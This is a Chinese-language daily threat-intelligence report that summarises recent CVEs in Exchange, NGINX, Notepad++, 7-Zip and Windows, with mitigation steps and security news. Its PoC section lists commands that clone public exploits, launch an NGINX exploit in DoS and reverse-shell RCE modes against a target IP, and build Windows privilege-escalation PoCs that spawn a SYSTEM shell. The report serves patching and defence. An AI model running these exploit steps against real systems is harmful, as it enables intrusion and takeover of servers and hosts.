每日安全情报报告 · 2026-05-30
报告日期 :2026年05月30日(星期六)
情报窗口 :近 24-48 小时 + 本周未收录重要事件
风险等级 :🔴 严重(CVSS ≥ 9.0) / 🟠 高危(CVSS 7.0--8.9) / 🟡 中危(CVSS 4.0--6.9)
数据来源:The Hacker News、GBHackers、CybersecurityNews、NVD、Microsoft MSRC、FreeBuf、Donews、GitHub
一、高危漏洞速报
🔴 CVE-2026-42897 · Microsoft Exchange Server 反射型 XSS 欺骗漏洞(在野利用)
| 字段 | 内容 |
|---|---|
| CVE 编号 | CVE-2026-42897 |
| CVSS 评分 | 8.1(高危) |
| 漏洞类型 | 反射型跨站脚本(Reflected XSS)→ 欺骗攻击 |
| 受影响组件 | Microsoft Exchange Server 2016 / 2019 / Subscription Edition(本地部署,Exchange Online 不受影响) |
| 风险等级 | 🟠 高危,已确认在野利用 ⚠️ |
| 修复状态 | 暂无补丁,微软提供临时缓解脚本 |
| CISA KEV | ✅ 2026-05-15 收录,联邦机构截止日 2026-05-29(今日) |
漏洞详情:攻击者通过向目标用户发送特制邮件,当受害者在 Outlook Web Access (OWA) 中打开邮件时,触发反射型 XSS,可在受害者浏览器上下文中执行任意 JavaScript 代码,实现欺骗攻击并可能进行凭证窃取或会话劫持。
攻击路径:特制邮件 → OWA 打开 → 触发 Reflected XSS → 执行任意 JS → 欺骗/凭证窃取
临时缓解方案:
powershell
# 下载 Exchange 本地缓解工具
# https://aka.ms/UnifiedEOMT
# 在 Exchange Management Shell(管理员权限)中运行:
# 单台服务器
.\EOMT.ps1 -CVE "CVE-2026-42897"
# 所有 Exchange 服务器
Get-ExchangeServer | Where-Object { $_.ServerRole -ne "Edge" } | .\EOMT.ps1 -CVE "CVE-2026-42897"参考链接 :
🔴 CVE-2026-42945 · NGINX Rift --- 潜伏 18 年的堆缓冲区溢出 RCE(在野利用)
| 字段 | 内容 |
|---|---|
| CVE 编号 | CVE-2026-42945 |
| CVSS 评分 | 9.2(严重)--- CVSS v4.0 |
| 漏洞类型 | 堆缓冲区溢出(Heap Buffer Overflow)→ DoS / RCE |
| 受影响组件 | NGINX 0.6.27 至 1.30.0(含 NGINX Plus,引入于 2008 年) |
| 修复版本 | NGINX 1.30.1+ |
| 风险等级 | 🔴 严重,已在野利用 ⚠️ |
| 利用条件 | 无需认证;DoS 门槛极低;RCE 需 ASLR 关闭 |
漏洞详情 :漏洞位于 ngx_http_rewrite_module 模块。处理包含问号(?)的 rewrite 指令时,长度计算阶段与数据拷贝阶段分配规则不一致,触发堆溢出。攻击者可构造特殊 HTTP 请求导致 worker 进程崩溃(DoS),在 ASLR 关闭环境下可实现 RCE。VulnCheck 已监测到攻击者针对该漏洞发动攻击尝试。
参考链接 :
🔴 CVE-2026-48778 · Notepad++ 命令注入 RCE(最新披露,PoC 公开)
| 字段 | 内容 |
|---|---|
| CVE 编号 | CVE-2026-48778 |
| 漏洞类型 | OS 命令注入(CWE-78)→ 任意代码执行 |
| 受影响版本 | Notepad++ ≤ 8.9.6 |
| 修复版本 | Notepad++ 8.9.6.1(2026-05-26 发布) |
| 披露日期 | 2026-05-28(约 48 小时前) |
| 风险等级 | 🟠 高危,PoC 已公开,全球 1500 万用户受影响 |
漏洞详情 :Notepad++ 读取 config.xml 配置文件中 <GUIConfig name="commandLineInterpreter"> 参数时,未进行任何验证。当用户触发「在 cmd 中打开所在文件夹」功能时,程序直接以配置中的路径启动可执行文件。攻击者可通过以下方式篡改配置:
-
直接修改
%APPDATA%\Notepad++\config.xml -
分发含恶意
-settingsDir参数的快捷方式 -
污染云同步的配置路径(OneDrive/Google Drive 同步目录)
同版本还修复了 CVE-2026-48770 (DoS)和 CVE-2026-48800(shortcuts.xml 任意代码执行)。
参考链接 :
🟠 CVE-2026-48095 · 7-Zip 堆缓冲区溢出 RCE(最新披露)
| 字段 | 内容 |
|---|---|
| CVE 编号 | CVE-2026-48095 |
| CVSS 评分 | 8.8(高危) |
| 漏洞类型 | 整数溢出 → 堆缓冲区写入溢出 → 任意代码执行 |
| 受影响版本 | 7-Zip 26.00 及更早版本(含 32位/64位) |
| 修复版本 | 7-Zip 26.01(2026-04-27 发布) |
| 披露日期 | 2026-05-26(4天前) |
| 风险等级 | 🟠 高危,通过恶意 ZIP 文件触发 |
漏洞详情 :漏洞位于 NtfsHandler.cpp 中的 CInStream::GetCuSize 函数,整数溢出导致堆缓冲区写入溢出。攻击者只需构造特制 ZIP 压缩包并诱使用户解压,即可触发任意代码执行或导致应用程序崩溃。7-Zip 全球下载量超过 10 亿次,波及范围极广。
参考链接 :
🟠 Windows "MiniPlasma" 零日提权漏洞(基于 CVE-2020-17103 补丁失效)
| 字段 | 内容 |
|---|---|
| 漏洞名称 | MiniPlasma |
| 相关 CVE | 基于 CVE-2020-17103 补丁失效(已重出江湖),暂无新 CVE |
| 漏洞位置 | Windows Cloud Files Mini Filter Driver(cldflt.sys)--- HsmOsBlockPlaceholderAccess |
| 受影响系统 | 所有 Windows 版本,含完整更新的 Windows 11(Insider Canary 版本除外) |
| 修复状态 | ❌ 暂无补丁 |
| PoC 状态 | ✅ 武器化 PoC 已公开(Chaotic Eclipse 发布) |
| 披露日期 | 2026-05-18 |
| 风险等级 | 🟠 高危,本地提权至 SYSTEM |
漏洞详情:安全研究员 Chaotic Eclipse(同一人此前发现 YellowKey、GreenPlasma)发现 2020 年微软针对 CVE-2020-17103 发布的补丁在后续更新中被静默回滚或从未真正生效。原始 PoC 无需任何修改即可在完整更新的 Windows 11 上稳定弹出 SYSTEM 权限的 cmd.exe。利用竞态条件(Race Condition)实现攻击,成功率存在一定波动。
参考链接 :
🟠 CVE-2026-40369 · Windows 11 内核任意写入 → 浏览器沙箱逃逸提权
| 字段 | 内容 |
|---|---|
| CVE 编号 | CVE-2026-40369 |
| CVSS 评分 | 7.8(高危) |
| 漏洞类型 | 内核任意地址写入(Arbitrary Kernel Address Increment)→ 本地提权 |
| 受影响组件 | ntoskrnl.exe --- ExpGetProcessInformation(NtQuerySystemInformation 信息类 253) |
| 受影响版本 | Windows 11 24H2、25H2 |
| PoC 状态 | ✅ 含 Chrome 沙箱逃逸仿真版 PoC 已公开(GitHub: orinimron123) |
| 披露日期 | 2026-05-21 |
| 风险等级 | 🟠 高危,可从 Chrome 等浏览器沙箱逃逸至 SYSTEM |
漏洞详情 :漏洞由安全研究员 Paolo Stagno 发现,原计划用于 Pwn2Own Berlin 2026 参赛,因提前公开导致参赛中止。攻击者可通过 Chrome 等浏览器调用 NtQuerySystemInformation(InfoClass=253) 绕过 ProbeForWrite 校验,实现从渲染进程沙箱到系统最高权限的确定性提权。
参考链接 :
🔴 Oracle CSPU 2026年5月 --- 首次月度关键安全补丁(今日发布)
| 字段 | 内容 |
|---|---|
| 发布日期 | 2026-05-29(昨日,Oracle 首次 CSPU) |
| 补丁数量 | 35 个安全补丁,修复 35 个 CVE,含 11 个严重更新 |
| 最高 CVSS | 10.0(满分) |
| 涉及产品 | Oracle Database Server、Oracle REST Data Services、Oracle Communications、Oracle E-Business Suite 等 |
| 风险等级 | 🔴 严重 |
概述:Oracle 本次首次以月度 CSPU(关键安全补丁更新)替代季度 CPU,标志着其补丁策略重大调整。本次共涉及 Oracle Database Server(CVE-2026-46834 等)、Oracle 通信产品线、Oracle Cloud 基础设施多条产品线,其中 11 个严重补丁含 RCE 风险。
参考链接 :
二、漏洞 PoC 速递
🟢 PoC #1 --- CVE-2026-42945(NGINX Rift)堆溢出利用
来源 :GitHub --- DepthFirstDisclosures/Nginx-Rift
发布时间 :2026-05-14
影响版本:NGINX 0.6.27 -- 1.30.0
使用步骤(仅限授权安全研究):
bash
# 1. 克隆仓库
git clone https://github.com/depthfirstdisclosures/nginx-rift.git
cd nginx-rift
# 2. 安装依赖
pip3 install -r requirements.txt # 或查看 requirements.txt
# 3. DoS 模式(触发 NGINX worker 崩溃,无需关闭 ASLR)
python3 exploit.py --host <目标IP> --port 80 --mode dos
# 4. RCE 模式(需目标 ASLR 已关闭)
python3 exploit.py --host <目标IP> --port 80 --mode rce --payload reverse_shell
# 5. 修复验证:确认目标 NGINX 版本
nginx -v # 应显示 1.30.1 或更高版本触发条件:目标 NGINX 配置中需包含带问号的 rewrite 规则,例如:
nginx
rewrite ^/old/(.*)$ /new/$1? last;防御建议:立即升级至 NGINX 1.30.1+,或临时移除含问号的 rewrite 规则。
参考链接 :
🟢 PoC #2 --- CVE-2026-40369(Windows 11 内核沙箱逃逸)
来源 :GitHub --- orinimron123/CVE-2026-40369-EXPLOIT
发布时间 :2026-05-21
影响平台:Windows 11 24H2 / 25H2
使用步骤(仅限授权安全研究):
bash
# 1. 克隆仓库
git clone https://github.com/orinimron123/CVE-2026-40369-EXPLOIT.git
cd CVE-2026-40369-EXPLOIT
# 2. 基础 PoC(内核任意地址写入,弹出 SYSTEM cmd)
# 在 Windows 11 目标机器上编译运行
cd basic_poc
msbuild basic_poc.sln /p:Configuration=Release
.\basic_poc.exe
# 3. 完整利用链(含 Chrome 沙箱逃逸仿真)
cd full_poc_with_chrome_sandbox_emulator
msbuild full_poc.sln /p:Configuration=Release
.\full_poc.exe
# 预期输出:弹出 SYSTEM 权限的 cmd.exe利用原理 :通过 NtQuerySystemInformation(InfoClass=253) 调用,绕过 ProbeForWrite 校验,实现内核地址递增写入,最终控制执行流并提权。
防御建议 :目前无官方补丁,可通过 Windows Defender Application Control (WDAC) 策略限制对 NtQuerySystemInformation 的低权限调用。
参考链接 :
🟢 PoC #3 --- Windows MiniPlasma 零日提权(基于 CVE-2020-17103 补丁失效)
来源 :由安全研究员 Chaotic Eclipse 公开发布(BleedingComputer/THN 报道)
发布时间 :2026-05-18
影响平台:所有 Windows 版本,含 Windows 11 最新更新
使用步骤(概念验证):
bash
# 原始 CVE-2020-17103 PoC 无需修改即可在最新 Windows 11 上运行
# (补丁已被静默回滚)
# 1. 获取 PoC(原始 CVE-2020-17103 由 Google Project Zero James Forshaw 发布)
# https://bugs.chromium.org/p/project-zero/issues/detail?id=2040
# 2. 编译运行(Visual Studio 2022)
git clone <MiniPlasma-PoC-repo>
cd MiniPlasma
msbuild MiniPlasma.vcxproj /p:Configuration=Release
.\MiniPlasma.exe
# 预期效果:以竞态条件触发,弹出 SYSTEM 权限的 cmd.exe
# 注意:成功率有一定波动,可能需要多次执行
# 3. 确认提权成功
whoami /priv # 显示 SYSTEM 权限防御建议 :暂无补丁,建议监控 cldflt.sys(Cloud Files Mini Filter Driver)异常行为,部署 EDR 检测异常 SYSTEM 令牌操作。
参考链接 :
三、网络安全前沿动态
📰 1. 恶意软件滥用 HuggingFace 进行数据窃取 --- MicrosoftSystem64 新型 RAT
来源:CybersecurityNews(2026-05-29)
新型恶意软件 MicrosoftSystem64 被发现通过 HuggingFace Datasets 平台路由窃取的数据,实现隐蔽 C2 通信。该手法利用受信任 AI 平台绕过传统网络安全监控。攻击者上传加密数据集并从目标主机下载,Datasets API 的合法流量混入数据外泄流量,使 DLP 和防火墙难以检测。安全研究员建议企业限制对 HuggingFace 非研究用途的访问,并监控异常的大规模数据集下载行为。
📰 2. 供应链攻击加剧 --- typosquatted NPM 包大规模窃取云 / CI/CD 密钥
来源:CybersecurityNews(2026-05-29)
研究人员发现多批通过域名仿冒的恶意 NPM 包,针对开发者环境中的云凭证(AWS、GCP、Azure 密钥)和 CI/CD 流水线密钥(GitHub Actions、GitLab CI、Jenkins)。攻击者注册与热门包(如 lodash、axios、express)名称相似的恶意包,借助 install 脚本在安装阶段即窃取环境变量中的密钥。多个 CI/CD 密钥泄露已导致下游供应链被入侵。
📰 3. FortiClient EMS 代码执行漏洞(CVE-2026-35616)被用于部署 EKZ 恶意软件
来源:CybersecurityNews(2026-05-29)
CVE-2026-35616(FortiClient EMS 预认证 API 绕过 RCE,CVSS 9.1)持续被威胁行为者利用,最新报告显示攻击者正通过该漏洞在企业端点部署 EKZ 恶意软件(一种具有持久化能力的后门 RAT)。该漏洞自 3 月以来已在 CISA KEV 目录中,但仍有大量企业未完成修复。研究机构统计显示目前约有 2000+ FortiClient EMS 实例仍在互联网暴露且未打补丁。
📰 4. 伪造 Adobe Document Cloud 页面静默安装 ScreenConnect RAT
来源:CybersecurityNews(2026-05-29)
针对金融机构的钓鱼活动被发现利用高度逼真的伪造 Adobe Document Cloud 文档共享页面,诱使目标用户下载并运行 ScreenConnect 远程管理工具(被作为 RAT 使用)。攻击者以电子邮件安全审计、合规文件核查为借口,发送附带伪造链接的邮件。一旦 ScreenConnect 安装完成,攻击者可获得完整远程控制权限,后续部署勒索软件或进行横向移动。
📰 5. JINX-0164 --- 利用 LinkedIn 社会工程攻击加密货币开发者
来源:CybersecurityNews(2026-05-29)
新威胁组织 JINX-0164 被揭露通过精心构造的 LinkedIn 资料(伪装为招聘人员或投资人)接触加密货币开发者,诱骗其下载自定义 macOS 恶意软件,具备密钥窃取、钱包助记词扫描和代码仓库克隆能力。该活动与朝鲜背景的"传染性访谈"行动具有相似手法特征,针对 DeFi 协议和加密货币交易所开发团队。
📰 6. 恶意 RVTools 安装包滥用 Sectigo 证书绕过 SmartScreen 传播恶意软件
来源:CybersecurityNews(2026-05-29)
攻击者分发伪造的 VMware RVTools 安装包(虚拟化环境管理工具),使用有效的 Sectigo 代码签名证书绕过 Microsoft SmartScreen 安全警告。受害者在安装后实际安装的是包含后门的版本,具备远程访问和凭证窃取能力。由于证书来自受信任 CA,传统基于证书信任的安全策略对此无效。建议从 RVTools 官方网站 下载,并验证文件哈希值。
📰 7. Oracle 启动月度安全补丁机制(CSPU)--- 行业补丁节奏新标杆
来源:Oracle 官方博客(2026-05-29)
Oracle 宣布正式将季度 CPU(关键补丁更新)调整为月度 CSPU(关键安全补丁更新),首次月度 CSPU 于 2026-05-29 发布,修复 35 个 CVE(含 11 个严重级),最高 CVSS 10.0。此举与微软月度 Patch Tuesday 机制对齐,意味着 Oracle 产品的漏洞修复将大幅提速。安全团队需更新补丁管理计划以适应月度补丁节奏。
四、本期风险摘要
| 漏洞编号 | 组件 | CVSS | 在野利用 | 优先级 |
|---|---|---|---|---|
| CVE-2026-42897 | Microsoft Exchange Server(本地) | 8.1 | ✅ 是 | 🔴 立即 |
| CVE-2026-42945 | NGINX 0.6.27--1.30.0 | 9.2 | ✅ 是 | 🔴 立即 |
| CVE-2026-48778 | Notepad++ ≤ 8.9.6 | 高危 | PoC 公开 | 🟠 72h 内 |
| CVE-2026-48095 | 7-Zip ≤ 26.00 | 8.8 | 概念验证 | 🟠 72h 内 |
| MiniPlasma | Windows cldflt.sys(全版本) | --- | PoC 公开 | 🟠 72h 内 |
| CVE-2026-40369 | Windows 11 24H2/25H2 内核 | 7.8 | PoC 公开 | 🟠 72h 内 |
| Oracle CSPU 2026-05 | Oracle 多产品线 | 最高 10.0 | --- | 🟡 本周 |
本期核心威胁 :
-
Exchange CVE-2026-42897 --- CISA KEV 联邦截止日今日到期,已在野利用,立即应用 EOMT 缓解脚本
-
NGINX Rift CVE-2026-42945 --- 影响亿级服务器,DoS 无前提条件,立即升级至 1.30.1
-
Windows 双零日(MiniPlasma + CVE-2026-40369) --- 无补丁,关注厂商更新,部署 EDR 监控
-
Notepad++ / 7-Zip 双高危 --- 立即升级(均已有正式修复版本)
免责声明 :本报告中 PoC 部分仅供授权安全研究和漏洞验证使用,严禁用于未经授权的系统攻击。所有操作请在合法授权环境下进行。
报告生成时间:2026-05-30 10:17 UTC+8